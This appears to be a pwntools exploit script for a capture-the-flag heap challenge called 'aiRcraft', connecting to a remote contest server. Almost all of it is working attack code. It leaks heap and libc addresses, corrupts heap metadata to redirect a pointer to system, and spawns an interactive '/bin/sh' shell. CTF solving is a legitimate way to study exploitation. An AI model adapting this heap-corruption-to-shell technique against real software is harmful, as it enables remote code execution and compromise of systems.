aiRcraft

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

host = "aircraft.2017.teamrois.cn"
port = 9731
r = remote(host,port)

def buy(name,idx):
    r.recvuntil(":")
    r.sendline("1")
    r.recvuntil(":")
    r.sendline(str(idx))
    r.recvuntil(":")
    r.sendline(name)

def build(name,size):
    r.recvuntil(":")
    r.sendline("2")
    r.recvuntil("?")
    r.sendline(str(size))
    r.recvuntil(":")
    r.sendline(name)

def enterair(idx):
    r.recvuntil(":")
    r.sendline("3")
    r.recvuntil("?")
    r.sendline(str(idx))


def selair(idx):
    enterair(idx)
    r.recvuntil("Your choice:")
    r.sendline("2")

def listplant(idx):
    enterair(idx)
    r.recvuntil(":")
    r.sendline("1")
def selectpla(name):
    r.recvuntil(":")
    r.sendline("4")
    r.recvuntil("?")
    r.sendline(name)

def selplant(name):
    selectpla(name)
    r.recvuntil(":")
    r.sendline("2")

def fly(name,idx):
    selectpla(name)
    r.recvuntil(":")
    r.sendline("1")
    r.recvuntil("?")
    r.sendline(str(idx))

def ret():
    r.recvuntil("Your choice:")
    r.sendline("3")
buy("a"*0x18,1)
build("orange",0x30)
build("meh",0x80)
buy("ddaa",13)
fly("ddaa",0)
ret()
listplant(0)
r.recvuntil("Build by ")
data = r.recvuntil("\n")[:-1]
heap = u64(data.ljust(8,"\x00")) - 0xf0
print "heap:",hex(heap)
ret()
selplant("ddaa")
build("b"*0x20 + p64(heap+0x130) + p64(heap+0x30) + p64(heap+0x10) ,0x48)
buy("1337",1)
selair(1)
listplant(0)
r.recvuntil("Build by ")
data = r.recvuntil("\n")[:-1]
libc = u64(data.ljust(8,"\x00"))  - 0x3c3b78
print "libc:",hex(libc)
ret()
build("fish",0x30) #3
buy("lays",0)
fly("lays",3)
selplant("lays")
free_chunk = libc + 0x3c3b40
build("c"*0x30 + p64(free_chunk-0x38) + p64(heap) ,0x48)
selair(3)
r.recvuntil(":")
buy("lays",0)
system = libc+ 0x45390
build("/bin/sh".ljust(0x20,"\x00") + p64(heap+0x130) + p64(heap+240) + p64(heap+0x10) + p64(0) + p64(system)[:7] ,0x48)
selplant("/bin/sh")
r.interactive()